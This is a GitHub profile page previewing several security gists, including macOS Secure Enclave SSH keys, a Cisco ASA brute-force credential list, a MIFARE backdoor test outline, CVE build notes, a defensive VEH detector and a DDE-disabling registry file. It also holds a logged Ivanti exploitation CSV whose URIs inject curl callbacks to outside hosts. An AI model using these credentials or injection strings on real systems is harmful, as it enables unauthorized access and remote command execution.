Skip to content

Instantly share code, notes, and snippets.

View HockeyInJune's full-sized avatar

Julian Cohen HockeyInJune

81 followers · 85 following
View GitHub Profile
@arianvp
arianvp / SSH_MACOS_SECURE_ENCLAVES.md
Last active December 9, 2025 01:32
Native Secure Enclaved backed ssh keys on MacOS

Native Secure Enclave backed ssh keys on MacOS

It turns out that MacOS Tahoe can generate and use secure-enclave backed SSH keys! This replaces projects like https://github.com/maxgoedjen/secretive

There is a shared library /usr/lib/ssh-keychain.dylib that traditionally has been used to add smartcard support to ssh by implementing PKCS11Provider interface. However since recently it also implements SecurityKeyProivder which supports loading keys directly from the secure enclave! SecurityKeyProvider is what is normally used to talk to FIDO2 devices (e.g. libfido2 can be used to talk to your Yubikey). However you can now use it to talk to your Secure Enclave instead!

@simokohonen
simokohonen / credentials.txt
Last active October 29, 2025 01:21
Cisco ASA login bruteforcing user + password list
cisco:ANYCONNECT.2017
anyconnect:Anyconnect*3!
cisco:anyconnect%4012345
cisco:CISCO.123456!
cisco:Anyconnect%402025
cisco:Anyconnect_17
cisco:CISCO%252
cisco:ANYCONNECT%2421
anyconnect:Anyconnect%26123456!
cisco:ANYCONNECT!2017!
@hackermondev
hackermondev / research.md
Last active December 8, 2025 22:28
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@dmaynor
dmaynor / gist:f1973ae244b5c2ed83d3b8e19f798f97
Created August 16, 2024 23:55
Mifare crypto backdoor flipper app
Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.
Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.
### **Step 1: Set Up the Development Environment**
1. **Install Flipper Zero SDK:**
- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.
2. **Clone the Flipper Zero Firmware:**
@mistymntncop
mistymntncop / CVE-2024-4761.js
Last active May 6, 2025 03:44
// Build d8 using:
// a) Run once
// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
// gclient sync
// gn gen ./out/x64.debug
// gn gen ./out/x64.release
//
// b)
// Debug Build:
// ninja -C ./out/x64.debug d8
@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
@theevilbit
theevilbit / get_apple_oss.sh
Last active December 9, 2025 02:07
Download All Apple OSS Tarballs from Github
#!/bin/zsh
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token
'
APPLE_OSS_DIR="all_apple_oss_archives"
APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt"
@olliencc
olliencc / WindowsVEHusingProcEnumandCount.cpp
Created January 2, 2022 10:25
Enumerates processes which use VEH via their PEB and then counts the number of VEHs present
/*
VEH misuse detector for Microsoft Windows
Released as open source by NCC Group Plc - http://www.nccgroup.com/
Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot com
Released under AGPL see LICENSE for more information
*/
@magoo
magoo / gist:db5cd518d4e442168d003567827818dd
Created August 1, 2018 18:18
https://apps.fcc.gov/edocs_public/attachmatch/DOC-332911A1.pdf
https://archives.fbi.gov/archives/newark/press-releases/2011/former-at-t-contractor-arrested-charged-with-unauthorized-access-of-servers
https://www.justice.gov/archive/opa/pr/2009/January/09-at-033.html
https://www.justice.gov/archive/usao/nj/Press/files/pdffiles/2008/Craig%20Filed%20Complaint.pdf
https://www.justice.gov/usao-ndal/pr/former-wireless-phone-company-employees-charged-selling-customer-information
http://www.al.com/news/birmingham/index.ssf/2017/03/former_gardendale_att_employee.html
http://fortune.com/2016/09/27/verizon-phone-records-breach/
https://www.databreaches.net/fl-call-center-employee-and-7-others-charged-in-id-theft-fraud-scheme-involving-att-customer-info/
https://www.fbi.gov/contact-us/field-offices/miami/news/press-releases/first-defendant-sentenced-in-identity-theft-fraud-scheme-involving-personal-identifying-information-from-at-t-customer-files
http://www.latimes.com/business/technology/la-fi-tn-verizon-data-20170712-s
@wdormann
wdormann / disable_ddeauto.reg
Last active October 1, 2024 17:10
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001